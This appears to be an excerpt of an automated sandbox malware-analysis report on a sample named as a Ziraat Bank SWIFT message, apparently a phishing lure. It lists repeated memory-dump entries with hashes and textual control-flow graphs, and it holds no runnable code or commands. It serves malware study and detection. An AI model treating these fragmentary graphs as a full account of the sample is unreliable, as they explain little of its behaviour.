                                  • Opcode ID: 205265d02eb9139ca3ca395d5e139ebab02a2670cddb5a6791df841e15c89ce3
                                  • Instruction ID: 2c8b4a9ff32433f13f7d0b7ce9cbb7313566977632a09e9a403deec0b1862cd6
                                  • Opcode Fuzzy Hash: 205265d02eb9139ca3ca395d5e139ebab02a2670cddb5a6791df841e15c89ce3
                                  • Instruction Fuzzy Hash: 6422B5B4A106299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26466a0d99cef2d6be7e2551ff6aa3b6ea3d21de1b26c7c25990cbc30197b032
                                  • Instruction ID: fe705af7950c6d76b2219838d378342f25ca11e9d998b72709530bac2707c420
                                  • Opcode Fuzzy Hash: 26466a0d99cef2d6be7e2551ff6aa3b6ea3d21de1b26c7c25990cbc30197b032
                                  • Instruction Fuzzy Hash: AA22B6B4A106299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14965 49d55f4-49d561b 15339 49d561b call 8cc0f0 14965->15339 15340 49d561b call 8cc150 14965->15340 14969 49d5621-49d56c9 15343 49d56c9 call 8cc8e8 14969->15343 15344 49d56c9 call 8cc9e8 14969->15344 14975 49d56cf-49d5720 15349 49d5720 call 8cd138 14975->15349 15350 49d5720 call 8cd318 14975->15350 15351 49d5720 call 8ccf98 14975->15351 15352 49d5720 call 8cd377 14975->15352 14978 49d5726-49d5777 15301 49d5777 call 8cd438 14978->15301 15302 49d5777 call 8cd3d7 14978->15302 14981 49d577d-49d57c2 15303 49d57c2 call 8cd438 14981->15303 15304 49d57c2 call 8cd3d7 14981->15304 15305 49d57c2 call 8cd907 14981->15305 14984 49d57c8-49d5845 15314 49d584b call 8cd9c8 14984->15314 15315 49d584b call 8cd969 14984->15315 14991 49d5851-49d587b 15319 49d587d call 8cdb58 14991->15319 15320 49d587d call 8cdb60 14991->15320 14995 49d5883-49d58ad 15327 49d58af call 8cdb58 14995->15327 15328 49d58af call 8cdb60 14995->15328 14999 49d58b5-49d58df 15331 49d58e1 call 8cdb58 14999->15331 15332 49d58e1 call 8cdb60 14999->15332 15003 49d58e7-49d5911 15341 49d5913 call 8cdb58 15003->15341 15342 49d5913 call 8cdb60 15003->15342 15007 49d5919-49d5942 call 49d3248 15347 49d5944 call 8cdb58 15007->15347 15348 49d5944 call 8cdb60 15007->15348 15012 49d594a-49d59b6 LdrInitializeThunk 15013 49d59bc-49d59df 15012->15013 15014 49d5c91-49d5ce8 call 8cdea8 15012->15014 15020 49d59e5 15013->15020 15021 49d5b26-49d5b49 15013->15021 15306 49d5ce8 call 8ce3cf 15014->15306 15307 49d5ce8 call 8ce49f 15014->15307 15308 49d5ce8 call 8cdea8 15014->15308 15309 49d5ce8 call 8ce3a7 15014->15309 15310 49d5ce8 call 8ce440 15014->15310 15020->15021 15022 49d59eb-49d5b21 call 49d3d10 * 8 15020->15022 15028 49d5b4f-49d5b51 15021->15028 15029 49d5b4b 15021->15029 15022->15014 15024 49d5cee-49d5d3f 15325 49d5d3f call 8ce500 15024->15325 15326 49d5d3f call 8ce560 15024->15326 15034 49d5b58-49d5b81 15028->15034 15032 49d5b4d 15029->15032 15033 49d5b53 15029->15033 15032->15028 15033->15034 15045 49d5b87-49d5b89 15034->15045 15046 49d5b83 15034->15046 15035 49d5d45-49d5d96 15335 49d5d96 call 8cf030 15035->15335 15336 49d5d96 call 8cf040 15035->15336 15050 49d5b90-49d5b96 15045->15050 15048 49d5b8b 15046->15048 15049 49d5b85 15046->15049 15047 49d5d9c-49d5de1 15353 49d5de1 call 8cf16d 15047->15353 15354 49d5de1 call 8cf170 15047->15354 15048->15050 15049->15045 15050->15014 15051 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 15050->15051 15051->15014 15059 49d5de7-49d5e2c 15311 49d5e2c call 8cf5b8 15059->15311 15312 49d5e2c call 8cf508 15059->15312 15313 49d5e2c call 8cf617 15059->15313 15069 49d5e32-49d5e83 15321 49d5e83 call 8cf93e 15069->15321 15322 49d5e83 call 8cf6d8 15069->15322 15323 49d5e83 call 8cf677 15069->15323 15324 49d5e83 call 8cfa10 15069->15324 15079 49d5e89-49d5ece 15337 49d5ece call 822ea0 15079->15337 15338 49d5ece call 822eb0 15079->15338 15088 49d5ed4-49d5f25 15345 49d5f25 call 823cc0 15088->15345 15346 49d5f25 call 823cb4 15088->15346 15097 49d5f2b-49d5fc7 15316 49d5fc7 call 824347 15097->15316 15317 49d5fc7 call 824288 15097->15317 15318 49d5fc7 call 8242e8 15097->15318 15118 49d5fcd-49d601e 15329 49d601e call 8243a8 15118->15329 15330 49d601e call 824408 15118->15330 15124 49d6024-49d6075 15333 49d6075 call 8245f8 15124->15333 15334 49d6075 call 8246a8 15124->15334 15127 49d607b-49d6145 15135 49d614b-49d619f 15127->15135 15136 49d65b1-49d65c2 15127->15136 15137 49d650f-49d651e 15135->15137 15144 49d65c8-49d65cf 15136->15144 15145 49d69a6-49d69ad 15136->15145 15138 49d6550-49d655f 15137->15138 15139 49d6520-49d6529 15137->15139 15141 49d656b-49d658a 15138->15141 15142 49d6561 15138->15142 15139->15138 15143 49d652b-49d6537 15139->15143 15150 49d658c-49d658e 15141->15150 15142->15141 15151 49d65a9 15143->15151 15152 49d6539-49d654e 15143->15152 15146 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 15144->15146 15147 49d6667-49d666e 15144->15147 15148 49d69af-49d6a0c 15145->15148 15149 49d6a17-49d6a32 15145->15149 15195 49d6636 15146->15195 15156 49d681a-49d6821 15147->15156 15157 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 15147->15157 15148->15149 15154 49d61a4-49d6216 15150->15154 15155 49d6594-49d65a7 15150->15155 15153 49d65ae 15151->15153 15152->15150 15165 49d65af 15153->15165 15154->15137 15188 49d621c-49d6223 15154->15188 15155->15153 15156->15145 15161 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 15156->15161 15157->15145 15161->15145 15165->15165 15189 49d6229-49d6347 call 49d3d10 * 8 15188->15189 15190 49d6392-49d63bd 15188->15190 15297 49d635e-49d638d 15189->15297 15298 49d6349-49d6353 15189->15298 15190->15137 15194 49d63c3-49d647f 15190->15194 15273 49d6485-49d64e6 15194->15273 15195->15145 15273->15137 15297->15137 15298->15297 15301->14981 15302->14981 15303->14984 15304->14984 15305->14984 15306->15024 15307->15024 15308->15024 15309->15024 15310->15024 15311->15069 15312->15069 15313->15069 15314->14991 15315->14991 15316->15118 15317->15118 15318->15118 15319->14995 15320->14995 15321->15079 15322->15079 15323->15079 15324->15079 15325->15035 15326->15035 15327->14999 15328->14999 15329->15124 15330->15124 15331->15003 15332->15003 15333->15127 15334->15127 15335->15047 15336->15047 15337->15088 15338->15088 15339->14969 15340->14969 15341->15007 15342->15007 15343->14975 15344->14975 15345->15097 15346->15097 15347->15012 15348->15012 15349->14978 15350->14978 15351->14978 15352->14978 15353->15059 15354->15059
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ac45273740e87d80cf2ac9dfef6cb495417f7351341651a6e381ed68d76eb9ed
                                  • Instruction ID: f86c86ea6f8f3ef0af69620a5d8abb4eb8319b8a093b4e486c88143d05c0c0a0
                                  • Opcode Fuzzy Hash: ac45273740e87d80cf2ac9dfef6cb495417f7351341651a6e381ed68d76eb9ed
                                  • Instruction Fuzzy Hash: E222B7B4A006299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15355 49d564b-49d56c9 15689 49d56c9 call 8cc8e8 15355->15689 15690 49d56c9 call 8cc9e8 15355->15690 15362 49d56cf-49d5720 15695 49d5720 call 8cd138 15362->15695 15696 49d5720 call 8cd318 15362->15696 15697 49d5720 call 8ccf98 15362->15697 15698 49d5720 call 8cd377 15362->15698 15365 49d5726-49d5777 15702 49d5777 call 8cd438 15365->15702 15703 49d5777 call 8cd3d7 15365->15703 15368 49d577d-49d57c2 15704 49d57c2 call 8cd438 15368->15704 15705 49d57c2 call 8cd3d7 15368->15705 15706 49d57c2 call 8cd907 15368->15706 15371 49d57c8-49d5845 15715 49d584b call 8cd9c8 15371->15715 15716 49d584b call 8cd969 15371->15716 15378 49d5851-49d587b 15720 49d587d call 8cdb58 15378->15720 15721 49d587d call 8cdb60 15378->15721 15382 49d5883-49d58ad 15728 49d58af call 8cdb58 15382->15728 15729 49d58af call 8cdb60 15382->15729 15386 49d58b5-49d58df 15732 49d58e1 call 8cdb58 15386->15732 15733 49d58e1 call 8cdb60 15386->15733 15390 49d58e7-49d5911 15687 49d5913 call 8cdb58 15390->15687 15688 49d5913 call 8cdb60 15390->15688 15394 49d5919-49d5942 call 49d3248 15693 49d5944 call 8cdb58 15394->15693 15694 49d5944 call 8cdb60 15394->15694 15399 49d594a-49d59b6 LdrInitializeThunk 15400 49d59bc-49d59df 15399->15400 15401 49d5c91-49d5ce8 call 8cdea8 15399->15401 15407 49d59e5 15400->15407 15408 49d5b26-49d5b49 15400->15408 15707 49d5ce8 call 8ce3cf 15401->15707 15708 49d5ce8 call 8ce49f 15401->15708 15709 49d5ce8 call 8cdea8 15401->15709 15710 49d5ce8 call 8ce3a7 15401->15710 15711 49d5ce8 call 8ce440 15401->15711 15407->15408 15409 49d59eb-49d5b21 call 49d3d10 * 8 15407->15409 15415 49d5b4f-49d5b51 15408->15415 15416 49d5b4b 15408->15416 15409->15401 15411 49d5cee-49d5d3f 15726 49d5d3f call 8ce500 15411->15726 15727 49d5d3f call 8ce560 15411->15727 15421 49d5b58-49d5b81 15415->15421 15419 49d5b4d 15416->15419 15420 49d5b53 15416->15420 15419->15415 15420->15421 15432 49d5b87-49d5b89 15421->15432 15433 49d5b83 15421->15433 15422 49d5d45-49d5d96 15736 49d5d96 call 8cf030 15422->15736 15737 49d5d96 call 8cf040 15422->15737 15437 49d5b90-49d5b96 15432->15437 15435 49d5b8b 15433->15435 15436 49d5b85 15433->15436 15434 49d5d9c-49d5de1 15699 49d5de1 call 8cf16d 15434->15699 15700 49d5de1 call 8cf170 15434->15700 15435->15437 15436->15432 15437->15401 15438 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 15437->15438 15438->15401 15446 49d5de7-49d5e2c 15712 49d5e2c call 8cf5b8 15446->15712 15713 49d5e2c call 8cf508 15446->15713 15714 49d5e2c call 8cf617 15446->15714 15456 49d5e32-49d5e83 15722 49d5e83 call 8cf93e 15456->15722 15723 49d5e83 call 8cf6d8 15456->15723 15724 49d5e83 call 8cf677 15456->15724 15725 49d5e83 call 8cfa10 15456->15725 15466 49d5e89-49d5ece 15738 49d5ece call 822ea0 15466->15738 15739 49d5ece call 822eb0 15466->15739 15475 49d5ed4-49d5f25 15691 49d5f25 call 823cc0 15475->15691 15692 49d5f25 call 823cb4 15475->15692 15484 49d5f2b-49d5fc7 15717 49d5fc7 call 824347 15484->15717 15718 49d5fc7 call 824288 15484->15718 15719 49d5fc7 call 8242e8 15484->15719 15505 49d5fcd-49d601e 15730 49d601e call 8243a8 15505->15730 15731 49d601e call 824408 15505->15731 15511 49d6024-49d6075 15734 49d6075 call 8245f8 15511->15734 15735 49d6075 call 8246a8 15511->15735 15514 49d607b-49d6145 15522 49d614b-49d619f 15514->15522 15523 49d65b1-49d65c2 15514->15523 15524 49d650f-49d651e 15522->15524 15531 49d65c8-49d65cf 15523->15531 15532 49d69a6-49d69ad 15523->15532 15525 49d6550-49d655f 15524->15525 15526 49d6520-49d6529 15524->15526 15528 49d656b-49d658a 15525->15528 15529 49d6561 15525->15529 15526->15525 15530 49d652b-49d6537 15526->15530 15537 49d658c-49d658e 15528->15537 15529->15528 15538 49d65a9 15530->15538 15539 49d6539-49d654e 15530->15539 15533 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 15531->15533 15534 49d6667-49d666e 15531->15534 15535 49d69af-49d6a0c 15532->15535 15536 49d6a17-49d6a32 15532->15536 15582 49d6636 15533->15582 15543 49d681a-49d6821 15534->15543 15544 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 15534->15544 15535->15536 15541 49d61a4-49d6216 15537->15541 15542 49d6594-49d65a7 15537->15542 15540 49d65ae 15538->15540 15539->15537 15552 49d65af 15540->15552 15541->15524 15575 49d621c-49d6223 15541->15575 15542->15540 15543->15532 15548 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 15543->15548 15544->15532 15548->15532 15552->15552 15576 49d6229-49d6347 call 49d3d10 * 8 15575->15576 15577 49d6392-49d63bd 15575->15577 15684 49d635e-49d638d 15576->15684 15685 49d6349-49d6353 15576->15685 15577->15524 15581 49d63c3-49d647f 15577->15581 15660 49d6485-49d64e6 15581->15660 15582->15532 15660->15524 15684->15524 15685->15684 15687->15394 15688->15394 15689->15362 15690->15362 15691->15484 15692->15484 15693->15399 15694->15399 15695->15365 15696->15365 15697->15365 15698->15365 15699->15446 15700->15446 15702->15368 15703->15368 15704->15371 15705->15371 15706->15371 15707->15411 15708->15411 15709->15411 15710->15411 15711->15411 15712->15456 15713->15456 15714->15456 15715->15378 15716->15378 15717->15505 15718->15505 15719->15505 15720->15382 15721->15382 15722->15466 15723->15466 15724->15466 15725->15466 15726->15422 15727->15422 15728->15386 15729->15386 15730->15511 15731->15511 15732->15390 15733->15390 15734->15514 15735->15514 15736->15434 15737->15434 15738->15475 15739->15475
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d9b70c2eeef257c38833b9f978fe760a8a8a35044fe0f46fad06ccb7e3b648c2
                                  • Instruction ID: ad746bbf2e8edadb8c9c8a36b40a801d7f3fc4f25562212c2ae74acf3f3eb90d
                                  • Opcode Fuzzy Hash: d9b70c2eeef257c38833b9f978fe760a8a8a35044fe0f46fad06ccb7e3b648c2
                                  • Instruction Fuzzy Hash: 0D22B7B4A006298FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15740 49d56a2-49d56c9 16083 49d56c9 call 8cc8e8 15740->16083 16084 49d56c9 call 8cc9e8 15740->16084 15744 49d56cf-49d5720 16089 49d5720 call 8cd138 15744->16089 16090 49d5720 call 8cd318 15744->16090 16091 49d5720 call 8ccf98 15744->16091 16092 49d5720 call 8cd377 15744->16092 15747 49d5726-49d5777 16096 49d5777 call 8cd438 15747->16096 16097 49d5777 call 8cd3d7 15747->16097 15750 49d577d-49d57c2 16098 49d57c2 call 8cd438 15750->16098 16099 49d57c2 call 8cd3d7 15750->16099 16100 49d57c2 call 8cd907 15750->16100 15753 49d57c8-49d5845 16109 49d584b call 8cd9c8 15753->16109 16110 49d584b call 8cd969 15753->16110 15760 49d5851-49d587b 16114 49d587d call 8cdb58 15760->16114 16115 49d587d call 8cdb60 15760->16115 15764 49d5883-49d58ad 16069 49d58af call 8cdb58 15764->16069 16070 49d58af call 8cdb60 15764->16070 15768 49d58b5-49d58df 16073 49d58e1 call 8cdb58 15768->16073 16074 49d58e1 call 8cdb60 15768->16074 15772 49d58e7-49d5911 16081 49d5913 call 8cdb58 15772->16081 16082 49d5913 call 8cdb60 15772->16082 15776 49d5919-49d5942 call 49d3248 16087 49d5944 call 8cdb58 15776->16087 16088 49d5944 call 8cdb60 15776->16088 15781 49d594a-49d59b6 LdrInitializeThunk 15782 49d59bc-49d59df 15781->15782 15783 49d5c91-49d5ce8 call 8cdea8 15781->15783 15789 49d59e5 15782->15789 15790 49d5b26-49d5b49 15782->15790 16101 49d5ce8 call 8ce3cf 15783->16101 16102 49d5ce8 call 8ce49f 15783->16102 16103 49d5ce8 call 8cdea8 15783->16103 16104 49d5ce8 call 8ce3a7 15783->16104 16105 49d5ce8 call 8ce440 15783->16105 15789->15790 15791 49d59eb-49d5b21 call 49d3d10 * 8 15789->15791 15797 49d5b4f-49d5b51 15790->15797 15798 49d5b4b 15790->15798 15791->15783 15793 49d5cee-49d5d3f 16120 49d5d3f call 8ce500 15793->16120 16121 49d5d3f call 8ce560 15793->16121 15803 49d5b58-49d5b81 15797->15803 15801 49d5b4d 15798->15801 15802 49d5b53 15798->15802 15801->15797 15802->15803 15814 49d5b87-49d5b89 15803->15814 15815 49d5b83 15803->15815 15804 49d5d45-49d5d96 16077 49d5d96 call 8cf030 15804->16077 16078 49d5d96 call 8cf040 15804->16078 15819 49d5b90-49d5b96 15814->15819 15817 49d5b8b 15815->15817 15818 49d5b85 15815->15818 15816 49d5d9c-49d5de1 16093 49d5de1 call 8cf16d 15816->16093 16094 49d5de1 call 8cf170 15816->16094 15817->15819 15818->15814 15819->15783 15820 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 15819->15820 15820->15783 15828 49d5de7-49d5e2c 16106 49d5e2c call 8cf5b8 15828->16106 16107 49d5e2c call 8cf508 15828->16107 16108 49d5e2c call 8cf617 15828->16108 15838 49d5e32-49d5e83 16116 49d5e83 call 8cf93e 15838->16116 16117 49d5e83 call 8cf6d8 15838->16117 16118 49d5e83 call 8cf677 15838->16118 16119 49d5e83 call 8cfa10 15838->16119 15848 49d5e89-49d5ece 16079 49d5ece call 822ea0 15848->16079 16080 49d5ece call 822eb0 15848->16080 15857 49d5ed4-49d5f25 16085 49d5f25 call 823cc0 15857->16085 16086 49d5f25 call 823cb4 15857->16086 15866 49d5f2b-49d5fc7 16111 49d5fc7 call 824347 15866->16111 16112 49d5fc7 call 824288 15866->16112 16113 49d5fc7 call 8242e8 15866->16113 15887 49d5fcd-49d601e 16071 49d601e call 8243a8 15887->16071 16072 49d601e call 824408 15887->16072 15893 49d6024-49d6075 16075 49d6075 call 8245f8 15893->16075 16076 49d6075 call 8246a8 15893->16076 15896 49d607b-49d6145 15904 49d614b-49d619f 15896->15904 15905 49d65b1-49d65c2 15896->15905 15906 49d650f-49d651e 15904->15906 15913 49d65c8-49d65cf 15905->15913 15914 49d69a6-49d69ad 15905->15914 15907 49d6550-49d655f 15906->15907 15908 49d6520-49d6529 15906->15908 15910 49d656b-49d658a 15907->15910 15911 49d6561 15907->15911 15908->15907 15912 49d652b-49d6537 15908->15912 15919 49d658c-49d658e 15910->15919 15911->15910 15920 49d65a9 15912->15920 15921 49d6539-49d654e 15912->15921 15915 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 15913->15915 15916 49d6667-49d666e 15913->15916 15917 49d69af-49d6a0c 15914->15917 15918 49d6a17-49d6a32 15914->15918 15964 49d6636 15915->15964 15925 49d681a-49d6821 15916->15925 15926 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 15916->15926 15917->15918 15923 49d61a4-49d6216 15919->15923 15924 49d6594-49d65a7 15919->15924 15922 49d65ae 15920->15922 15921->15919 15934 49d65af 15922->15934 15923->15906 15957 49d621c-49d6223 15923->15957 15924->15922 15925->15914 15930 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 15925->15930 15926->15914 15930->15914 15934->15934 15958 49d6229-49d6347 call 49d3d10 * 8 15957->15958 15959 49d6392-49d63bd 15957->15959 16066 49d635e-49d638d 15958->16066 16067 49d6349-49d6353 15958->16067 15959->15906 15963 49d63c3-49d647f 15959->15963 16042 49d6485-49d64e6 15963->16042 15964->15914 16042->15906 16066->15906 16067->16066 16069->15768 16070->15768 16071->15893 16072->15893 16073->15772 16074->15772 16075->15896 16076->15896 16077->15816 16078->15816 16079->15857 16080->15857 16081->15776 16082->15776 16083->15744 16084->15744 16085->15866 16086->15866 16087->15781 16088->15781 16089->15747 16090->15747 16091->15747 16092->15747 16093->15828 16094->15828 16096->15750 16097->15750 16098->15753 16099->15753 16100->15753 16101->15793 16102->15793 16103->15793 16104->15793 16105->15793 16106->15838 16107->15838 16108->15838 16109->15760 16110->15760 16111->15887 16112->15887 16113->15887 16114->15764 16115->15764 16116->15848 16117->15848 16118->15848 16119->15848 16120->15804 16121->15804
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4cad2592d6ee811a1ed85cc22e2f66b3971d64aab9a1816ae5361a89501c657d
                                  • Instruction ID: cd0d6910568c8a0d28db777d232d0a6279f87e24917d90249741b96e46a50f53
                                  • Opcode Fuzzy Hash: 4cad2592d6ee811a1ed85cc22e2f66b3971d64aab9a1816ae5361a89501c657d
                                  • Instruction Fuzzy Hash: 1D12B8B4A006299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3310DB34AE85CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16251 49d56f9-49d5720 16608 49d5720 call 8cd138 16251->16608 16609 49d5720 call 8cd318 16251->16609 16610 49d5720 call 8ccf98 16251->16610 16611 49d5720 call 8cd377 16251->16611 16255 49d5726-49d5777 16615 49d5777 call 8cd438 16255->16615 16616 49d5777 call 8cd3d7 16255->16616 16258 49d577d-49d57c2 16617 49d57c2 call 8cd438 16258->16617 16618 49d57c2 call 8cd3d7 16258->16618 16619 49d57c2 call 8cd907 16258->16619 16261 49d57c8-49d5845 16577 49d584b call 8cd9c8 16261->16577 16578 49d584b call 8cd969 16261->16578 16268 49d5851-49d587b 16582 49d587d call 8cdb58 16268->16582 16583 49d587d call 8cdb60 16268->16583 16272 49d5883-49d58ad 16590 49d58af call 8cdb58 16272->16590 16591 49d58af call 8cdb60 16272->16591 16276 49d58b5-49d58df 16594 49d58e1 call 8cdb58 16276->16594 16595 49d58e1 call 8cdb60 16276->16595 16280 49d58e7-49d5911 16602 49d5913 call 8cdb58 16280->16602 16603 49d5913 call 8cdb60 16280->16603 16284 49d5919-49d5942 call 49d3248 16606 49d5944 call 8cdb58 16284->16606 16607 49d5944 call 8cdb60 16284->16607 16289 49d594a-49d59b6 LdrInitializeThunk 16290 49d59bc-49d59df 16289->16290 16291 49d5c91-49d5ce8 call 8cdea8 16289->16291 16297 49d59e5 16290->16297 16298 49d5b26-49d5b49 16290->16298 16620 49d5ce8 call 8ce3cf 16291->16620 16621 49d5ce8 call 8ce49f 16291->16621 16622 49d5ce8 call 8cdea8 16291->16622 16623 49d5ce8 call 8ce3a7 16291->16623 16624 49d5ce8 call 8ce440 16291->16624 16297->16298 16299 49d59eb-49d5b21 call 49d3d10 * 8 16297->16299 16305 49d5b4f-49d5b51 16298->16305 16306 49d5b4b 16298->16306 16299->16291 16301 49d5cee-49d5d3f 16588 49d5d3f call 8ce500 16301->16588 16589 49d5d3f call 8ce560 16301->16589 16311 49d5b58-49d5b81 16305->16311 16309 49d5b4d 16306->16309 16310 49d5b53 16306->16310 16309->16305 16310->16311 16322 49d5b87-49d5b89 16311->16322 16323 49d5b83 16311->16323 16312 49d5d45-49d5d96 16598 49d5d96 call 8cf030 16312->16598 16599 49d5d96 call 8cf040 16312->16599 16327 49d5b90-49d5b96 16322->16327 16325 49d5b8b 16323->16325 16326 49d5b85 16323->16326 16324 49d5d9c-49d5de1 16612 49d5de1 call 8cf16d 16324->16612 16613 49d5de1 call 8cf170 16324->16613 16325->16327 16326->16322 16327->16291 16328 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 16327->16328 16328->16291 16336 49d5de7-49d5e2c 16625 49d5e2c call 8cf5b8 16336->16625 16626 49d5e2c call 8cf508 16336->16626 16627 49d5e2c call 8cf617 16336->16627 16346 49d5e32-49d5e83 16584 49d5e83 call 8cf93e 16346->16584 16585 49d5e83 call 8cf6d8 16346->16585 16586 49d5e83 call 8cf677 16346->16586 16587 49d5e83 call 8cfa10 16346->16587 16356 49d5e89-49d5ece 16600 49d5ece call 822ea0 16356->16600 16601 49d5ece call 822eb0 16356->16601 16365 49d5ed4-49d5f25 16604 49d5f25 call 823cc0 16365->16604 16605 49d5f25 call 823cb4 16365->16605 16374 49d5f2b-49d5fc7 16579 49d5fc7 call 824347 16374->16579 16580 49d5fc7 call 824288 16374->16580 16581 49d5fc7 call 8242e8 16374->16581 16395 49d5fcd-49d601e 16592 49d601e call 8243a8 16395->16592 16593 49d601e call 824408 16395->16593 16401 49d6024-49d6075 16596 49d6075 call 8245f8 16401->16596 16597 49d6075 call 8246a8 16401->16597 16404 49d607b-49d6145 16412 49d614b-49d619f 16404->16412 16413 49d65b1-49d65c2 16404->16413 16414 49d650f-49d651e 16412->16414 16421 49d65c8-49d65cf 16413->16421 16422 49d69a6-49d69ad 16413->16422 16415 49d6550-49d655f 16414->16415 16416 49d6520-49d6529 16414->16416 16418 49d656b-49d658a 16415->16418 16419 49d6561 16415->16419 16416->16415 16420 49d652b-49d6537 16416->16420 16427 49d658c-49d658e 16418->16427 16419->16418 16428 49d65a9 16420->16428 16429 49d6539-49d654e 16420->16429 16423 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 16421->16423 16424 49d6667-49d666e 16421->16424 16425 49d69af-49d6a0c 16422->16425 16426 49d6a17-49d6a32 16422->16426 16472 49d6636 16423->16472 16433 49d681a-49d6821 16424->16433 16434 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 16424->16434 16425->16426 16431 49d61a4-49d6216 16427->16431 16432 49d6594-49d65a7 16427->16432 16430 49d65ae 16428->16430 16429->16427 16442 49d65af 16430->16442 16431->16414 16465 49d621c-49d6223 16431->16465 16432->16430 16433->16422 16438 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 16433->16438 16434->16422 16438->16422 16442->16442 16466 49d6229-49d6347 call 49d3d10 * 8 16465->16466 16467 49d6392-49d63bd 16465->16467 16574 49d635e-49d638d 16466->16574 16575 49d6349-49d6353 16466->16575 16467->16414 16471 49d63c3-49d647f 16467->16471 16550 49d6485-49d64e6 16471->16550 16472->16422 16550->16414 16574->16414 16575->16574 16577->16268 16578->16268 16579->16395 16580->16395 16581->16395 16582->16272 16583->16272 16584->16356 16585->16356 16586->16356 16587->16356 16588->16312 16589->16312 16590->16276 16591->16276 16592->16401 16593->16401 16594->16280 16595->16280 16596->16404 16597->16404 16598->16324 16599->16324 16600->16365 16601->16365 16602->16284 16603->16284 16604->16374 16605->16374 16606->16289 16607->16289 16608->16255 16609->16255 16610->16255 16611->16255 16612->16336 16613->16336 16615->16258 16616->16258 16617->16261 16618->16261 16619->16261 16620->16301 16621->16301 16622->16301 16623->16301 16624->16301 16625->16346 16626->16346 16627->16346
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bb3891ba26d821f407d629293973fa930b841b6f65df3535e4b71f743f501d95
                                  • Instruction ID: 4a80b03e52317e76a83a1eab73ae594a1819b078362d5efc159b5bf9ce2e88f4
                                  • Opcode Fuzzy Hash: bb3891ba26d821f407d629293973fa930b841b6f65df3535e4b71f743f501d95
                                  • Instruction Fuzzy Hash: A512B8B4A006299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3314DB34AE85CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
